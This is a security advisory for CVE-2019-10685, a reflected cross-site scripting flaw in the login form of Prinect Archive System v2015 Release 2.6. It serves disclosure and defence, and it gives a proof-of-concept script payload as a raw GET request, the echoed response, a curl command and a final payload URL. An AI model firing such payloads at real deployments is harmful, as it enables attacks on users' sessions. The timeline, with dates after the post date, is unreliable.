ExploitFixes
Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting 2019-05-07 21:05:16

Details
================
Software: Prinect Archive System
Version: v2015 Release 2.6
Homepage: https://www.heidelberg.com
Advisory report: https://github.com/alt3kx/CVE-2019-10685
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10685
CVSS: 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE-79

Description
================
A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6

Vulnerability
================
The user supplied input containing JavaScript is echoed back in JavaScript code in an HTML response via the "TextField" parameter.

Proof of concept
================

Reflected XSS
Payload: <script>alert(1)</script>

The offending GET request is:

GET /am/Login,loginForm.sdirect?formids=TextField,TextField_0,link&amp;submitmode=&amp;submitname=&amp;TextField=<script>alert(1)</script>&amp;TextField_0=l0V!i1s!C2 HTTP/1.1
Host: victim_IP:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F

Reflected XSS Reponse:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 04 Feb 2019 13:15:12 GMT
Connection: close

[../snip]

id=&quot;msgContainer&quot;&gt;Authentication failed for: &lt;script&gt;alert(1)&lt;/script&gt; &lt;br/&gt;Click Help button for more information about login permissions.&lt;/div&gt;

# curl -i -s -k -X GET

-H &quot;Host: victim:8090&quot;
-H &quot;Accept-Encoding: gzip, deflate&quot;
-H &quot;Accept: */*&quot;
-H &quot;Accept-Language: en-US,en-GB;q=0.9,en;q=0.8&quot;
-H &quot;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36&quot;
-H &quot;Connection: close&quot;
-H &quot;Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F&quot;
-b &quot;JSESSIONID=C665EA9A7594E736D39C93EA8763A01F&quot;
&quot;http://victim:8090/am/Login,loginForm.sdirect?formids=TextField,TextField_0,link&amp;submitmode=&amp;submitname=&amp;TextField=<script>alert(1)</script>&amp;TextField_0=l0V!i1s!C2&quot;
--proxy http://127.0.0.1:8080

Final payload into URL:

http://victim_IP:8090/am/Login,loginForm.sdirect?formids=TextField,TextField_0,link&amp;submitmode=&amp;submitname=&amp;TextField=<script>alert(1)</script>&amp;TextField_0=l0V!i1s!C2

Mitigations
================
No more feedback from the vendor:
https://www.heidelberg.com

Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.

This vulnerability will be published if we do not receive a response to this report with 10 days.

Timeline
================

2019-02-04: Discovered
2019-02-25: Retest PRO environment
2019-03-25: Retest on researcher's ecosystem
2019-04-02: Vendor notification
2019-04-03: Vendor feedback received
2019-04-08: Reminder sent
2019-04-08: 2nd reminder sent
2019-04-11: Internal communication
2019-04-26: No more feedback received from the vendor
2019-05-30: New issues found
2019-06-30: Public Disclosure

Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit https://github.com/alt3kx for more information.

My current exploit list @exploit-db:
https://www.exploit-db.com/author/?a=1074 &amp; https://www.exploit-db.com/author/?a=9576